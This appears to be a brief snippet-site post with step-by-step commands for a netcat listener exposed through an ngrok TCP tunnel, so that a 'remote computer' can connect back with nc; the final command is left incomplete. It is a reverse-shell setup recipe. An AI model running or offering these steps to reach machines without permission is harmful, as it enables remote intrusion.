📅  最后修改于: 2022-03-11 14:50:12.501000             🧑  作者: Mango
nc -lvnp 87
^^^ Run this command on shell session#1
ngrok tcp 87
^^^ Run this command on shell session#2
^^^ Both sessions should be simultaneously running
^^^ In the shown screen look for domain name and port in "Forwarding"
nslookup
^^^ Get its ip through nslookup command
nc
^^^ On remote computer, execute this command.